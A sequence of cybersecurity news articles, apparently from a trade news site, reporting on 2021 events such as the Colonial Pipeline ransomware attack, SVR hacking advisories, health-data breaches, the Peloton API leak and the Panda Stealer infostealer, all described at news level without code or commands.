The UK authorities took down over 700,000 malicious and phishing sites last year, a huge increase from 2019, according to the National Cyber Security Centre (NCSC).
The GCHQ body revealed the figures in its annual Active Cyber Defence (ACD) report. ACD is the NCSC’s four-year-old strategy to protect the public sector and, where possible, a broader audience.
It does so via a toolkit of around 14 initiatives, headed by the Takedown Service, which involves finding and removing malicious websites from the internet.
As well as 700,000+ websites, the service removed 1.4 million malicious URLs. Although COVID-19 scams surged in 2020, the NCSC said that the 15-fold increase in the volume of sites taken down was due to an expansion of the service, which saw it invest in a wider set of measures to address “different categories of campaigns.”
Among the institutions protected by the ACD last year was the NHS. The NCSC claimed to have detected and blocked 122 phishing campaigns spoofing the health service, up from just 36 in 2019. This included fake vaccine lures and over 40 malicious apps masquerading as official titles such as NHS Test and Trace in third-party app stores.
Also spoofed was the TV Licensing agency, which was hit by a surge of scam emails in July 2020 when entitlements for pensioners changed, and tax office the HMRC, which was the most phished brand last year.
Overall, more than 11,000 government-themed phishing campaigns were taken down — more than double the 2019 figure.
Meanwhile, the Suspicious Email Reporting Service, only launched in April 2020, received nearly four million reports by the end of the year, leading to the removal of over 26,000 scams not previously identified by the Takedown Service.
NCSC technical director, Ian Levy, said the ACD was made possible through partnerships at home and abroad.
“This has never been more important than in the last year, where it was vital for us to do everything we could to protect our most critical services and the wider public during the pandemic,” he added.
“The bold defensive approach taken by the ACD program continues to ensure our national resilience and so I urge public bodies, companies and the general public to sign up to the services available to help everyone stay safe online.”
The full ACD report is available to read here.
The US and UK governments have released new information on the current tactics of Russian cyber-spies, including 11 vulnerabilities dating back to 2018 that are being used for initial access.
The new report, Further TTPs associated with SVR cyber actors, was released by the UK’s National Cyber Security Agency (NCSC) and the US Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency and FBI.
It updates readers on the activities of the Russian Foreign Intelligence Service (SVR) — also known as APT29, Cozy Bear, and The Dukes — blamed for the recent SolarWinds attacks and many other espionage campaigns.
In a classic cat-and-mouse game, the SVR appears to have recently changed its tactics in response to a previous report issued by the US and UK, in an attempt to stay hidden.
This includes exploitation of widely reported Microsoft Exchange Server bugs, they claimed.
The report also listed 11 flaws in products from Fortinet, Cisco, Oracle, Zimbra, Pulse Secure, Citrix, Elasticsearch, VMware and F5 which are being exploited by the SVR to gain access to victim networks.
“This list should not be treated as exhaustive,” the report warned.
“The group will look to rapidly exploit recently released public vulnerabilities which are likely to enable initial access to their targets.”
The government report also flagged the SVR’s use of legitimate tool Cobalt Strike, as well as a custom backdoor (GoldMax), downloader (Sibot), HTTP tracer tool (GoldFinder), and open source Red Team command and control framework (Sliver), in post-compromise activity.
Organizations should be particularly careful to protect their administrator mailboxes as these are a common target for SVR attackers, who use access to better understand the victim’s network and to obtain further privileges and credentials for persistence and lateral movement.
Gurucul CEO, Saryu Nayyar, argued that as long as unpatched systems remain openly accessible, attacks will continue.
“The payloads may change depending on what the threat actor is after, but attackers will continue to leverage vulnerabilities in web servers, routers and virtualization software until there aren't any vulnerable hosts to exploit,” she added.
“This series of attacks is a reminder of how important it is to patch security vulnerabilities, and to make sure the network is protected with an up-to-date security stack.”
The US government has been forced to issue emergency legislation after a ransomware attack knocked offline the country’s largest fuel pipeline.
Colonial Pipeline confirmed over the weekend that it had suffered a serious cyber-attack.
“Quickly after learning of the attack, Colonial proactively took certain systems offline to contain the threat. These actions temporarily halted all pipeline operations and affected some of our IT systems, which we are actively in the process of restoring,” it said in an update on Sunday.
“While our mainlines (Lines 1, 2, 3 and 4) remain offline, some smaller lateral lines between terminals and delivery points are now operational. We are in the process of restoring service to other laterals and will bring our full system back online only when we believe it is safe to do so, and in full compliance with the approval of all federal regulations.”
The government legislation is designed to relax rules restricting the transportation of fuel by road.
However, if the outage persists there are likely to be shortages and price rises across the 12 states the pipeline travels through and beyond. Reports suggest it carries 2.5 million barrels a day, representing nearly half of the East Coast’s supply of diesel, gasoline and jet fuel.
According to the BBC, the attack was launched by the Russian-speaking DarkSide group, who claim to have also stolen 100GB of data in a classic “double extortion” play.
“Being able to take systems offline and begin a process of restoration is undeniably important, but there is an additional threat if this data is exposed. It underlines the importance of international collaboration to bring down these highly coordinated groups early in their development if we want to protect our critical services,” argued Nominet government cybersecurity expert, Steve Forbes.
“As we watch the domino effect of this cyber-attack, it is very apparent that impact is not limited to systems and software — victims will come in all shapes and sizes, from industries to individuals.”
Three Maryland residents are suspected of being involved in dating and business email compromise (BEC) scams that defrauded victims out of more than $2.3m.
An indictment returned in March by a federal grand jury and unsealed yesterday charges 37-year-old Baltimore resident Noel Chimezuru Agoha, 34-year-old Sessieu Ange Oulai of Parkville, and 32-year-old Essex resident Kelechi Arthur Ntibunka with conspiracy to commit wire fraud, conspiracy to commit money laundering, and aggravated identity theft.
Court documents allege that from August 2016 to December 2018, the three defendants conspired with others to execute a BEC scam in which Agoha, Oulai, and Ntibunka sent deceptive emails and made fraudulent phone calls to victim businesses.
In the communications, the defendants allegedly tried to induce money from their victims by posing as clients or representatives of companies with whom the victims had ongoing business.
"The parties being impersonated were also victimized by the BEC scam because the object of the fraud was to intercept payments intended for these parties and/or to deprive these parties of money to which they were entitled," stated the Department of Justice.
Bank accounts known as drop accounts were allegedly opened by Agoha, Oulai, and Ntibunka and their co-conspirators to receive money sent by the victims and monitored by the defendants. Details of deposits, transfers, and balances were allegedly relayed to their conspirators by the defendants over text messages.
The indictment alleges that the defendants and their co-conspirators received, or attempted to receive, more than $1.1m in proceeds from BEC scams.
Agoha is further accused of conspiring with others to run an online dating scam from May 2016 to July 2018. Victims were tricked into believing that they were in a real romantic relationship by scammers who then claimed they were in financial hardship and asked for money.
Through this ruse, Agoha and their co-conspirators allegedly accrued more than $1.2m.
Agoha and Ntibunka were arrested on May 5 and taken before US Magistrate Judge Beth Gesner, who ordered that they be detained pending a hearing scheduled for May 12. Oulai was already in custody over unrelated state charges when the indictment was unsealed.
A federal lawsuit has been filed against Pennsylvania and a vendor contracted by the state's Department of Health (DOH) over a data breach that exposed the personal health information (PHI) of thousands of Pennsylvanians.
The DOH hired Atlanta-based company Insight Global in 2020 "to provide contact tracing and other similar services" following the outbreak of COVID-19. The Department later said that employees of the company caused a data breach by creating "unauthorized documents outside of the secure data systems created by the Commonwealth."
Information exposed in the data breach included names, phone numbers, and medical information belonging to 72,000 individuals.
The data breach was first reported by WPXI TV show Target 11 on April 30 after the show's team learned of the incident via a whistleblower. The show's investigator Rick Earle today reported that a lawsuit has been filed over the breach.
Insight Global and the Pennsylvania Department of Health are named as defendants in the suit, which claims that data breach victims now face an increased risk of identity theft.
The plaintiffs allege that the data breach was a “direct result of Defendants’ failure to implement adequate and reasonable cybersecurity procedures and protocols."
In the suit, Insight Global is accused of maintaining “unsecure spreadsheets, databases and or documents containing the PHI (public health information).”
In a statement by the company sent to Earle, Insight Global claimed to be unaware of any litigation regarding the data breach.
“Insight Global has not been served with the lawsuit and will need time to analyze any allegations, but can say that we are working closely with the Pennsylvania Department of Health to identify any individuals whose information may have been affected and have taken steps to secure and prevent any further access to, or disclosure of, information," stated the company.
The DOH has stated that it will not be renewing its contract with Insight Global after it expires on July 31. State representatives meeting in Harrisburg on Monday reportedly called for the contract to be terminated immediately and for an investigation into the breach to be launched by a state House Oversight Committee.
Mitigating bot attacks is a major concern for security leaders, according to new research published yesterday by cybersecurity company Human (formerly White Ops).
In the first quarter of 2021, ESG asked 425 cybersecurity and IT decision makers with application security knowledge and responsibilities for their organizations about their perceptions of and responses to bot attacks.
Leaders expressed concerns that bots could cause site slowdowns by overwhelming traffic, new account fraud, credential cracking/brute force attacks, account takeover, content manipulation, sensitive content scraping, and inventory exhaustion and cart abandonment.
Among the report's key findings are that nearly half of respondents believed their organization would be susceptible to a sophisticated bot attack.
Most of those surveyed (90%) said that they viewed bot management as a top-five cybersecurity priority. This finding aligns with security leaders' view of how sophisticated bots are, as 86% of respondents said they believed most bots are capable of circumventing simple bot mitigation features.
“This research demonstrates how crucial a robust bot mitigation platform is to a strong cybersecurity posture,” said Tamer Hassan, co-founder and CEO of HUMAN.
“Sophisticated bots can have immense detrimental effects to customer experience, and the time it takes to rebuild trust with customers is time that today’s organizations don’t have.”
The impact of bot attacks upon those surveyed was significant, with 37% of respondents confirming that they had been victimized by sophisticated bots in the past twelve months. Another 30% believed they had suffered a bot attack but were unable to confirm it.
Senior analyst at ESG, John Grady, said bot attacks were on the rise.
“As organizations have shifted to more online-focused business operations, a trend further accelerated by the pandemic, attackers have doubled down on their efforts and increased the frequency of bot-driven fraud and logic abuse,” said Grady.
“This new research explores how application security leaders perceive the threat of bot attacks and what their plans are for combatting them.”
The UK’s National Cyber Security Centre (NCSC) has published a set of security principles to underpin the development of so-called smart cities.
Titled Connected Places Cyber Security Principles, the guidance aims to help local authorities in the UK embrace the benefits of connected places, while at the same time ensure they are resilient to cyber-attacks.
The smart city concept involves the use of connected technology, such as IoT devices, to collect data and enhance services within a built environment. Examples of smart city technologies include the use of parking sensors to provide real-time data on space availability and sensors to monitor pollution levels.
Despite these benefits, security experts believe smart cities will be heavily targeted by cyber-criminals via methods such as ransomware as a result of the critical public functions they will perform and the numerous security vulnerabilities that are associated with IoT devices.
The guidance outlines the high-level security requirements and principles that should be considered and implemented in the development of smart city technology. These include advising local authorities to think about the cybersecurity governance and skills they will need and the role of third-party suppliers in the process. The NCSC also sets out how connected environments can be designed in a way that is resilient and scalable, and able to protect data.
Dr. Ian Levy, technical director at the NCSC, stated: “Local authorities are using sensors and intelligent systems to improve our lives and make our cities more efficient and environmentally friendly.
“While these benefits should be embraced, it’s important to take steps now to reduce the risk of cyber-attacks and their potentially serious impact on these interconnected networks. I urge every individual and organisation establishing a connected place in the UK to consult our newly published cybersecurity principles.
“It’s our collective responsibility to ensure that our cities of the future are safe and resilient.”
Commenting, Mark Jackson, national cybersecurity advisor, Cisco UK and Ireland, outlined how the publication is part of a broad strategy to enhance the security of IoT technology in general: “Cities and metropolitan districts across the UK are at the point of turning their smart city strategies into actionable plans—with many having already conducted proof of concepts or successful trials. The complexity of the smart cities marketplace, with multiple device manufacturers and IT providers in play, could quite easily present cybersecurity issues that undermine these efforts. The NCSC's principles are one of the most sophisticated pieces of government-led guidance published in Europe to date.
“The guidance set out for connected places generally aligns to cybersecurity best practice for enterprise environments, but also accounts for the challenges of connecting up different systems within our national critical infrastructure. With the DCMS also planning to implement legislation around smart device security, this is indicative of a broader government strategy to level up IoT security across the board.”
Millions of households could be at risk of cyber-attack because they’re running outdated and unpatched routers, a new investigation has found.
Unprotected routers are an increasingly popular target for attackers, theoretically enabling them to hijack smart home devices and eavesdrop on communications and web browsing.
Consumer rights group Which surveyed more than 6000 UK adults back in December to find out which router models they were using.
Extrapolating this data, it calculated that as many as 7.5 million households may be running routers with security issues.
After selecting some of the most common devices, it enlisted the help of Red Maple Technologies to test them, and discovered issues with more than half, from ISPs including Virgin, Sky, TalkTalk, EE and Vodafone.
One of the most common issues was a lack of firmware updates, leaving the devices potentially exposed to exploitation. Which claimed most of the models it tested hadn’t been updated since 2018, and some since 2016 — affecting an estimated six million users.
Another problem is weak default passwords which are easy to guess, allowing remote attackers to potentially hijack devices.
The researchers also discovered local network vulnerabilities, although these require an attacker to be within Wi-Fi range to exploit.
Which said not all old routers are inherently insecure, as long as they don’t allow weak default passwords and have regular firmware updates. However, it urged consumers to check and change any weak passwords and to request a new model if theirs is no longer receiving updates.
Tripwire VP of product management and strategy, Tim Erlin, argued that most modern connected devices will automatically update.
“The situation with updating connected devices in consumers’ homes has changed fairly dramatically and rapidly. It wasn’t long ago that the idea of a device automatically updating without the user’s knowledge was considered problematic, whereas now it’s a basic expectation,” he added.
“That rapid shift has left a sizable security gap in terms of deployed devices that don’t auto-update. Unfortunately, it’s likely that gap won’t be closed until those devices are simply replaced.”
An organization involved in COVID-19 research lost a week’s worth of critical data after a Ryuk attack which used a stolen password, according to Sophos.
Cybersecurity vendor Sophos revealed the case yesterday as a cautionary tale of what can happen when organizations don’t follow security best practice.
The problem was traced back to one of the university students that the European research institute collaborates with as part of its outreach programs.
That student obtained what they thought was a 'crack' version of a data visualization tool they needed, except in reality it contained information-stealing malware. The individual apparently disabled Windows Defender and their PC firewall after the security tool triggered a malware alert pre-download.
The malware harvested keystrokes, stealing browser, cookies, clipboard data and, it transpired, the student’s log-ins for the research institute.
“Thirteen days later a remote desktop protocol (RDP) connection was registered on the institute’s network using the student’s credentials,” Sophos explained.
“A feature of RDP is that a connection also triggers the automatic installation of a printer driver, enabling users to print documents remotely. This allowed the Rapid Response investigation team to see that the registered RDP connection involved a Russian language printer driver and was likely to be a rogue connection. Ten days after this connection was made, the Ryuk ransomware was launched.”
Although the unnamed biomolecular specialist had back-ups, they were not fully up-to-date, meaning that a week’s worth of vital research was lost. The firm also suffered a significant operational cost as all computer and server files had to be rebuilt from the ground-up before data could be restored, the security vendor said.
“It is unlikely that the operators behind the ‘pirated software’ malware are the same as the ones who launched the Ryuk attack,” said Peter Mackenzie, manager of Rapid Response at Sophos.
“The underground market for previously compromised networks offering attackers easy initial access is thriving, so we believe that the malware operators sold their access on to another attacker. The RDP connection could have been the access brokers testing their access.”
Sophos recommended organizations deploy multi-factor authentication (MFA) for access to any internal networks, especially from third-parties, keep software regularly updated, segment networks and restrict account privileges.
It also urged customers to lock down RDP access with static Local Area Network (LAN) rules, via a group policy or using access control lists.
At team at AV reviews site SafetyDetectives found the China-based Elasticsearch server exposed online without any password protection or encryption.
The 7GB trove contained over 13 million records including the email addresses and WhatsApp/Telegram phone numbers of vendor contacts, plus email addresses, surnames, PayPal account details and Amazon account profiles of reviewers.
According to SafetyDetectives, fake review scams typically begin with vendors sending their reviewer contacts a list of products for which they would like a five-star review.
After leaving the review and sending the vendor a link, the reviewer will be paid via PayPal to compensate them for the product purchase and will be allowed to keep the product itself as payment. The reviews site claimed that the leak implicated around 200,000 individuals in such schemes.
The SafetyDetectives team discovered the database on March 1 and it was secured around a week later, although the researchers weren’t able to track down its owner.
“Given the extent of the records and vendors included in the database, it’s possible that the server is not owned by the Amazon vendors running the scam. The server could be owned by a third party that reaches out to potential reviewers on behalf of the vendors,” it explained.
“Third parties might post a picture of the product in a Facebook or WeChat group, asking for reviews in return for free products. The server could also be owned by a large company with several subsidiaries, which would explain the presence of multiple vendors. What’s clear is that whoever owns the server could be subject to punishments from consumer protection laws, and whoever is paying for these fake reviews may face sanctions for breaking Amazon’s terms of service.”
There’s also a potential data security and identity fraud risk for those whose information was exposed in the privacy snafu, SafetyDetectives warned.
The United States has imprisoned a man who continued to cyber-stalk his ex-wife and kids after they moved states and changed their names to evade him.
The determined Oscar Adrian Marquez tracked his former wife, Jennifer Lorraine, and two daughters from New Mexico to Oregon, harassing them even after they purchased guns and took out a protection order against him.
Following a three-day trial in November 2020, 47-year-old Marquez was convicted of stalking, cyberstalking, and three counts of interstate violation of a protective order.
During his trial, the jury were played a song recorded by Marquez. The ditty—named "I only need one bullet"—detailed how one bullet would be sufficient "to settle the score" with the person who "took my kids, my money, my life, when you walked out that door."
On the stand at trial, Marquez suggested that the bullet he was singing about would be used against himself.
The Marquez' marriage broke down in 2014 after what his wife described as years of physical and emotional abuse. That summer, Marquez kidnapped his children in the middle of the night. After being missing for a week, they were found in El Paso.
Lorraine reported his abuse and the kidnapping to the FBI, but that didn't stop Marquez from threatening to kill his ex-wife and her family and threatening them via voicemail and social media.
In 2017, Lorraine moved her family to Portland, Oregon, where she contacted the Oregon Crime Victims Law Center to keep their home address confidential and registered her protective order in the state's courts.
Lorraine then bought mace, a Taser, guns, and a guard dog and installed an alarm and camera system in her home together with a silent 911 button.
Marquez left a note at Lorraine's mother's house, stating that he was going to find her daughter. On July 16, 2019, he posted his ex-wife’s new name and home address in Portland on social media.
Thirteen days later, Marquez was arrested as he drove past his ex-wife's new residence for a third time.
US District Judge Michael Mosman described Marquez as “unusually unhinged” and "unusually" obsessed with his victims before sentencing him on May 3 to ten years in prison.
At least three American healthcare providers have suffered a data breach after a cyber-attack on an administrative services company in Texas.
CaptureRx, which is based in San Antonio, fell victim to a ransomware attack on February 6. On February 19, an investigation into the attack determined that certain files had been accessed without authorization.
During the attack, cyber-criminals exfiltrated files containing the personal health information (PHI) of more than 24,000 individuals.
CaptureRx serves the Mohawk Valley Health System affiliate Faxton St. Luke’s Healthcare in New York, Thrifty Drug Stores (Thrifty White), and Gifford Health Care of Randolph, Vermont, among others.
A review of the attack, completed on March 19, determined that the security breach impacted 17,655 patients of Faxton St. Luke's Healthcare and a further 6,777 patients at Gifford Health Care. The number of Thrifty Drug Store patients affected by the attack has not yet been determined.
HIPAA Journal reports that CaptureRx is currently unclear how many of its healthcare provider clients have been affected by the attack. Nor has the company finished its final tally of how many individuals had their PHI exposed because of the incident.
Data exposed and stolen by the ransomware attackers included names, dates of birth, prescription information, and, for a limited number of patients, medical record numbers.
Affected healthcare provider clients were notified of the incident by CaptureRx between March 30 and April 7.
WKTV reports that 100 patients of Faxton St. Luke's Healthcare were not notified of the data breach because CaptureRx was unable to verify a valid mailing address for them.
The company said no evidence has been found to suggest that the data stolen in the attack has been misused. Impacted individuals have been advised to closely monitor their bank accounts for any incidences of fraudulent activity.
"Data privacy and security are among CaptureRx’s highest priorities, and there are extensive measures in place to protect information in CaptureRx’s care," stated Capture Rx.
"As part of CaptureRx’s ongoing commitment to the security of information, all policies and procedures are being reviewed and enhanced and additional workforce training is being conducted to reduce the likelihood of a similar event in the future."
The United States Department of Defense (DOD) has expanded its ethical hacking program to include more targets.
DoD officials announced yesterday that the Department's Vulnerability Disclosure Program will be broadened to include all publicly accessible DOD information systems.
Bug hunters were first invited to engage with the DOD in 2016 when the initiative 'Hack the Pentagon' was launched. Through this initiative, the Defense Digital Service set up a bug bounty program to reward ethical hackers for identifying flaws in the Department's digital defenses.
Director of the Defense Digital Service Brett Goldstein said that before the initiative was introduced, ethical hackers who discovered a vulnerability had no way of communicating their findings to the DOD.
"Because of this, many vulnerabilities went unreported," said Goldstein.
He added: "The DOD Vulnerability Policy launched in 2016 because we demonstrated the efficacy of working with the hacker community and even hiring hackers to find and fix vulnerabilities in systems."
When the vulnerability hunting policy was first established, it was limited to DOD public-facing applications and websites.
Goldstein said that the newly announced expansion will allow for research and reporting of vulnerabilities detected in all DOD publicly accessible networks, Internet of Things, industrial control systems, frequency-based communication, and more.
"This expansion is a testament to transforming the government's approach to security and leapfrogging the current state of technology within DOD," said the director.
The expanded Vulnerability Disclosure program will continue to be overseen by the DOD's Cyber Crime Center. Growing it to catch more vulnerabilities and improve cybersecurity was an obvious and sensible progression, according to program director Kristopher Johnson.
He said: "The department has always maintained the perspective that DOD websites were only the beginning as they account for a fraction of our overall attack surface," he said.
Ethical hackers have submitted more than 29,000 vulnerability reports through the Vulnerability Disclosure Program since it was launched. Johnson said that over 70% of those reported weaknesses proved to be valid.
The program director said that he expects the number of disclosures reported by the security researcher community to increase significantly with the expansion of the program, which was last extended in 2018.
Financial services and insurance organizations experienced a 125% rise in exposure to mobile phishing attacks in 2020 compared to 2019, according to Lookout’s Financial Services Threat Report.
The cloud security firm also found that malware and app risk exposure went up by more than 400% on average per quarter last year among the industry’s employees and customers. This was despite a 50% growth in mobile device management deployment during this period.
This surge in exposure to risk has come as cyber-criminals have deliberately ramped up their targeting of phones, tablets, and Chromebooks to try to exploit vulnerabilities. Lookout noted that even a single successful phishing or mobile ransomware attack can enable access to highly sensitive data in this industry, including proprietary market research, client financials, and investment strategies.
Another finding from the study, which looked at telemetry data from nearly 200 million mobile devices and 140 million apps, was that almost 50% of phishing attempts attempted to steal corporate login credentials.
Particularly concerning was that close to 20% of mobile banking customers had a trojanized app on their device when trying to sign in to their account.
Additionally, Lookout revealed the extent to which delays in downloading the latest software updates for mobiles exposes users to significant cyber-risks. More than a fifth (21%) of iOS and around a third (32%) of Android devices were exposed to more than 390 iOS and 1060 Android vulnerabilities, respectively, due to running iOS 13 or earlier and Android 10 or earlier.
Gert-Jan Schenk, chief revenue officer, Lookout, commented: "These findings demonstrate that regardless of whether a device is managed or unmanaged, attackers have equal success in deploying phishing campaigns.
“In addition, phishing can be particularly difficult to detect on a mobile device. We inherently trust these devices, which makes us vulnerable to social engineering attacks. Protecting modern endpoints requires a different approach—one that is built from the ground up for mobile and can continuously secure an organizations’ data from endpoint to the cloud.”
Data breach incidents reported to the UK’s financial regulator dropped by nearly a third from 2019 to 2020, although experts claim this is far from an accurate picture of the current threat landscape.
However, the data received, a 30% year-on-year drop in reported breaches to just 76 in 2020, was at odds with its own figures. These showed a 56% average increase in incidents over the same time period across all sectors — with the financial services sector slightly higher still.
Given the pandemic has provided even more opportunities for threat actors to target organizations distracted by remote working, the figures are doubly puzzling.
Kroll argued that the disparity could be explained by more organizations pulling back, after an initial period of over-reporting following the introduction of the GDPR.
In many cases, legal counsel is recommending firms not to notify if they think reporting thresholds around whether data subjects were “harmed” are not met, it said.
“The GDPR is still a relatively new and complex piece of legislation and we certainly saw businesses being hyper-vigilant when it came to reporting to the ICO and the FCA in its initial stages of implementation,” explained Keily Blair, head of Orrick, Herrington & Sutcliffe’s UK Cyber, Privacy and Data Innovation team.
“The drop in the FCA numbers likely reflects that organizations are becoming more adept at assessing whether an incident truly meets the necessary thresholds to trigger a report to the FCA.”
She argued that the FCA’s official figures are likely to represent the tip of the iceberg in terms of security breaches at financial services firms.
“The worry is that by seeing these figures, without the benefit of knowing what is happening below the surface, organizations may misinterpret the true nature and extent of the cybersecurity threat leading to complacency and greater risk," she warned.
Across Europe and across all sectors, year-on-year breach notifications increased by 19% in 2020, according to DLA Piper.
A security researcher has discovered several issues with the software used by exercise equipment maker Peloton, which may have leaked sensitive customer information to unauthenticated users.
Pen Test Partners explained in a new blog post that the problem could be traced back to unauthenticated API endpoints, which could have allowed hackers to interrogate information on all users.
Among the potentially exposed data was user and instructor IDs, group membership, location, workout stats, gender and age, and whether users are in the studio or not.
“The mobile, web application and back-end APIs had several endpoints that revealed users’ information to both authenticated and unauthenticated users,” the security consultancy said.
“A full investigation should be conducted by Peloton to improve their security, especially now that famous individuals are openly using this service.”
The security flaws were so bad that it leaked information even for users in privacy mode, Pen Test Partners claimed.
Peloton has become hugely popular during the pandemic as a way for locked-down consumers to keep fit at home. The firm claims to have over three million subscribers, including famous users such as US President Biden, who probably don’t want their workout stats and location made public.
Unfortunately, Peloton initially appeared to make a few mistakes in its handling of the responsible disclosure.
According to Pen Test Partners: “it acknowledged the disclosure, then ignored me and silently ‘fixed’ one of the issues. The ‘fix’ didn’t fix the vulnerability.”
The security firm was forced to reach out to a journalist months after its initial disclosure to try and start a constructive dialog.
“Shortly after contact was made with the press office at Peloton we had contact direct from Peloton’s CISO, who was new in post. The vulnerabilities were largely fixed within seven days,” it concluded.
“It’s a shame that our disclosure wasn’t responded to in a timely manner and also a shame that we had to involve a journalist in order to get listened to.”
Jason Kent, hacker in residence at Cequence Security, argued that 2021 could be the year of the API attack unless organizations find and properly secure all of their API endpoints.
“The leaky Peloton API is just the latest example of how hard it can be for API developers to get authentication just right. In needing to build an API that allows some users to share information and build community, while respecting those who want privacy by ensuring the data is secure, they have risked all user data,” he added.
“The information might not show in the application itself, but developers and security teams need to also confirm that the APIs themselves conform to the security measures in place.”
Half of British manufacturers and even more in the automotive sector suffered a successful cyber-attack last year, but cost remains a major barrier to improvements, according to an industry body.
Make UK, which represents the sector, claimed that the 47% figure overall rose to 62% for carmakers.
Although security has become a bigger priority for 50% of its members since the start of the pandemic, and 61% now have a board director responsible for cyber, 59% cited cost as the biggest barrier to building enhanced cyber protections.
As with organizations in many sectors, the move to mass remote working during the pandemic exposed many manufacturers to an increase in online threats. Make UK claimed the shift to remote production and remote monitoring of equipment, with staff working from home “on hastily supplied laptops” provided new opportunities for hackers to strike.
Manufacturing was the third most frequently targeted sector for ransomware last year globally, according to Trend Micro.
In the UK, 63% experienced losses of up to £5000 and nearly a quarter (22%) lost between £5000 and £25,000.
On the positive front, things slowly seem to be improving in the sector. Over two-fifths (43%) of respondents to the Make UK poll said they’ve been asked by a customer to demonstrate or guarantee the robustness of their cyber processes. Plus, one fifth claimed to have asked customers or suppliers to prove similar.
However, 44% still don’t offer staff cybersecurity awareness training and 47% don’t have a formalized incident response plan in place, the report found.
The cyber-threat to manufacturers is undoubtedly growing, warned Make UK CEO, Stephen Phipson.
“No business can afford to ignore this issue and while the increased awareness across the sector is encouraging, there is still much to be done with too many businesses still burying their heads in the sand,” he argued.
“This is a strategic threat; failing to get this right as a nation could cost the UK economy billions of pounds and put thousands of jobs at risk. Every business is vulnerable and every business needs to take the necessary steps to protect themselves properly.”
A teenager from Florida who allegedly hacked into the accounts of Pensacola high school students to cast fraudulent homecoming court votes for herself is facing felony charges.
Tate High School homecoming queen Emily Rose Grover allegedly teamed up with her mother, 50-year-old Laura Rose Carroll, to cast nearly 250 fake votes. Carroll works as an assistant principal at Bellview Elementary School in Escambia County.
Agents with the Florida Department of Law Enforcement (FDLE) arrested Pensacola residents Carroll and Grover on March 15, 2021.
Each defendant was charged with one count each of offenses against users of computers, computer systems, computer networks, and electronic devices (a third-degree felony), unlawful use of a two-way communications device (a third-degree felony), criminal use of personally identifiable information (a third-degree felony), and conspiracy to commit these offenses (a first-degree misdemeanor).
An investigation into the homecoming election was instigated in November 2020 when the Escambia County School District contacted local police to report unauthorized access into hundreds of student accounts.
The investigation found that Carroll and her daughter had accessed 246 student FOCUS accounts. The accounts are part of the FOCUS program, the school district’s student information system, to which Carroll had district-level access.
"In October 2020, hundreds of votes for Tate High School’s Homecoming Court voting were flagged as fraudulent, with 117 votes originating from the same IP address within a short period of time," said a FDLE spokesperson.
"Agents uncovered evidence of unauthorized access to FOCUS linked to Carroll’s cell phone as well as computers associated with their residence, with a total of 246 votes cast for the Homecoming Court."
When police interviewed students at Grover's high school, many of them reported hearing Grover describe how she had used her mother's FOCUS account to cast homecoming queen votes for herself.
"The investigation also found that beginning August 2019, Carroll’s FOCUS account accessed 372 high school records and 339 of those were of Tate High School students," said the FLDE.
The county's State Attorney’s Office has reportedly stated that eighteen-year-old Grover, who was aged 17 at the time of the alleged offense, will be tried as an adult when her case comes to court next week..
A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam.
The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States.
Panda Stealer was discovered by Trend Micro at the start of April. Threat researchers have identified two infection chains being used by the campaign.
They said: "In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer.
"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command."
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.
Other cards up Panda's sleeve are the ability to take screenshots of the infected computer and the power to exfiltrate data from browsers, like cookies, passwords, and cards.
Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended.
Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de.
"Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers.
While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.
CTO Michael Gorelik, who heads the threat intelligence team for Morphisec, has seen the number of infostealers shoot up since the Emotet network was disrupted.
When analyzing the different types of attacks Morphisec detected across seven million enterprise endpoints over the last 12 months, Gorelik found that infostealers made up the highest percentage of attempted endpoint attacks (31%).
Poor Working Relationships Between Security and Networking Teams Preventing Benefits of Digital Transformation
Organizations’ digital transformation projects are being held back through lack of collaboration between security and networking teams, according to a new study by Netskope.
The survey of IT professionals in the UK, France, and Germany, undertaken by Censuswide on behalf of the cloud security firm, revealed that two key components of IT teams—networking and security—often have a poor working relationship. Despite nearly half (45%) of security and networking teams operating within the same group and reporting to a common boss, 43% of those surveyed stated that "the security and networking teams don’t really work together much."
An even higher proportion (44%) of IT pros described the relationship between these teams in negative terms—"combative" (13%), "dysfunctional" (10%), "frosty" (10%), or "irrelevant" (10%).
This appears to be having major consequences, with more than half (51%) of participants agreeing that lack of collaboration between specialist teams is preventing their organization from experiencing the benefits of digital transformation. This figure rose to 54% when focusing on the responses of CIOs.
The findings come in the context of a surge in new or accelerated digital transformation projects in the past year brought about by the COVID-19 crisis, which has forced many organizations to change the way they operate. Undertaking such transformations safely requires close collaboration with security teams.
More encouragingly, the network and security professionals surveyed highlighted the same top three priorities for driving their team’s activity in 2021, which are "supporting increased productivity for the organization as a whole," "increasing visibility and control," and "expansion of infrastructure to support business growth." Additionally, the survey found that digital transformation projects are being regularly pursued by both teams, with 85% of all participants either working on such a project or having just completed one.
Andre Stewart, VP and MD EMEA at Netskope, commented: “All big companies have their politics and often different divisions compete for budget or strategic importance at the board level but digital transformation is happening now. A more dispersed workforce using a greater number of apps for greater efficiency is creating exponential data growth and a much broader attack surface for hackers. That means network transformation and security transformation must happen now with digital transformation.
“Given this evident divide between networking and security teams CEOs and/or CIOs must get involved or the progress and competitive advantage that could be reaped from digital transformation will be weak.”